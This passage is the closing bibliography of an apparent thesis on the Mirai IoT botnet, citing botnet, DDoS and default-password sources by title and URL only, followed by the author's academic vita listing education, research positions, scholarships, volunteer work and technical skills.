[20] “Linux.Darlloz,” web, https://www.symantec.com/security_response/writeup.jsp.
[21] Kovacs, E. (2014), “BASHLITE Malware Uses ShellShock to Hijack Devices Running BusyBox,” web, http://www.securityweek.com/bashlite-malware-uses-shellshock-hijack-devices-running-busybox.
[22] Silva, S. S., R. M. Silva, R. C. Pinto, and R. M. Salles (2013) “Botnets: A survey,” Computer Networks, 57(2), pp. 378–403.
[23] Kalt, C. (2000), “Internet Relay Chat: Client Protocol,” web, https://tools.ietf.org/html/rfc2812.
[24] “BOOTERS, STRESSERS AND DDOSERS,” web, https://www.incapsula.com/ddos/booters-stressers-ddosers.html.
[25] Francis, R. (2017), “Hire a DDoS service to take down your enemies,” web, http://www.csoonline.com/article/3180246/data-protection/hire-a-ddos-service-to-take-down-your-enemies.html.
[26] Kan, M. (2016), “Dozens arrested in international DDoS-for-hire crackdown,” web, http://www.pcworld.com/article/3149543/security/dozens-arrested-in-international-ddos-for-hire-crackdown.html.

[27] Kassner, M. (2010), “The top 10 spam botnets: New and improved,” web, http://www.techrepublic.com/blog/10-things/the-top-10-spam-botnets-new-and-improved/.
[28] Krebs, B. (2016), “Source Code for IoT Botnet ’Mirai’ Released,” web, https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/.

[29] Krebs, B. (2017) “Who is Anna-Senpai, the Mirai Worm Author?” Krebs on Security.
[30] Zeifman, I., D. Bekerman, and B. Herzberg (2016) “Breaking Down Mirai: An IoT DDoS Botnet Analysis,” Imperva. Source: https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html.
[31] Krebs, B. (2016), “Who Makes the IoT Things Under Attack?”
[32] “BusyBox Command Help,” web, https://busybox.net/downloads/BusyBox.html.
[33] Nixon, A. and P. Lamy (2016), “Mirai and IoT: Understanding DDoS Impact Means Accurately Analyzing the Past,” web, https://www.flashpoint-intel.com/blog/cybercrime/mirai-iot-understanding-ddos-impact/.
[34] “New IoT Malware? Anime/Kami,” web, https://evosec.eu/new-iot-malware/.
[35] “fd_set(3) - Linux man page,” web, https://linux.die.net/man/3/fd_set.

[36] Kincaid, J. (2009), “Google’s Go: A New Programming Language That’s Python Meets C++,” web, https://techcrunch.com/2009/11/10/google-go-language/.
[37] “The Go Programming Language - Package net,” web, https://golang.org/pkg/net/.
[38] Brown, R. G., “Dieharder: A Random Number Test Suite,” web, http://www.phy.duke.edu/~rgb/General/dieharder.php.
[39] Yao, A. C. (1982) “Theory and application of trapdoor functions,” in Foundations of Computer Science, 1982. SFCS’08. 23rd Annual Symposium on, IEEE, pp. 80–91.
[40] Baig, A. (2017), “Top 5 Countries Where Cyber Attacks Originate,” web, https://securitytoday.com/Articles/2017/03/03/Top-5-Countries-Where-Cyber-Attacks-Originate.aspx.
[41] “Qbot,” web, https://github.com/geniosa/qbot.
[42] Ace, E. (2016), “IP Cameras Default Passwords Directory,” web, https://ipvm.com/reports/ip-cameras-default-passwords-directory.

[43] Olmstead, K. and A. Smith (2017), “What the Public Knows About Cybersecurity,” web, http://www.pewinternet.org/2017/03/22/what-the-public-knows-about-cybersecurity/.
[44] Fair, L. (2017), “D-Link case alleges inadequate Internet of Things security practices,” web, https://www.ftc.gov/news-events/blogs/business-blog/2017/01/d-link-case-alleges-inadequate-internet-things-security.
[45] “Go by Example: Channels,” web, https://gobyexample.com/channels.
[46] Fisher, T. (2017), “Cisco Default Password List,” web, https://www.lifewire.com/cisco-default-password-list-2619151.

[47] “HiSilicon IP camera root passwords,” web, https://gist.github.com/gabonator/74cdd6ab4f733047356198c781f27d.
[48] “SMC ROUTER Default Login, Password and IP,” web, http://www.cleancss.com/router-default/SMC/ROUTER.
[49] “The common router ID and password Daquan,” web, http://www.programmershare.com/308830/.

Academic Vita of Meghan Riegel

Education
Master of Science in Computer Science and Engineering
Bachelor of Science in Computer Engineering with Honors in Computer Science and Engineering

Thesis Title: Tracking Mirai: An In-Depth Analysis of an IoT Botnet
Thesis Supervisor: Dr. Patrick McDaniel

Work Experience

Cybersecurity Collaborative Research Alliance, University Park, PA, 01/2015 – 05/2017
Graduate Research Assistant
• Research Focuses: Networks, Network Security, Applied Cryptography, Mobile Security
• Evaluated the security and privacy of social media applications on Android mobile devices
• Assisted in the development and testing of multi-channel secret-sharing protocols
• Investigating the security of embedded devices

Applied Physics Laboratory, University Park, PA, 10/2016 – 02/2017
Student Researcher
• Researching topics in network analysis and reverse engineering

Applied Communication Sciences, University Park, PA, 06/2015 – 08/2015
Software Developer [via the Collaborative Research Alliance]
• Developed network visualization tools to help researchers better understand and predict network threats

GE Aviation, Grand Rapids, MI, 05/2014 – 08/2014
Systems Intern

Grants Received
• CyberCorps Scholarship For Service
• Schreyer Honors College Scholarship
• Wolgemuth Engineering Merit Scholarship

Community Service Involvement

Penn State Dance Marathon Technology Committee, 04/2016 – 04/2017
Project Manager and Lead Developer – THINK Team
• Spearheading the rewrite of THON’s internal website THINK, which is the central management system for the multi-million-dollar philanthropy
• THINK is written in Python, HTML, CSS, and JavaScript and contains over 70,000 lines of code
• Leading a team of five developers and working with THON leadership to implement desired features

Engineering Ambassadors, 08/2014 – 05/2017
• Professional development program with an outreach mission, representing the College of Engineering
• Formally trained in communicating engineering concepts and in giving formal presentations

Atlas Benefitting THON, 08/2012 – 05/2017
2014 Captain, 2015 Executive Board, 2016 Dancer

Skills
Proficient Languages: Bash, C/C++, HTML/CSS, JavaScript, LaTeX, Python, SQL
Exposure To: Java, jQuery, MIPS, Swift
Frameworks, Tools & Environments: Apache, Bootstrap, Django, GitHub, MySQL, Unix/Linux, Wireshark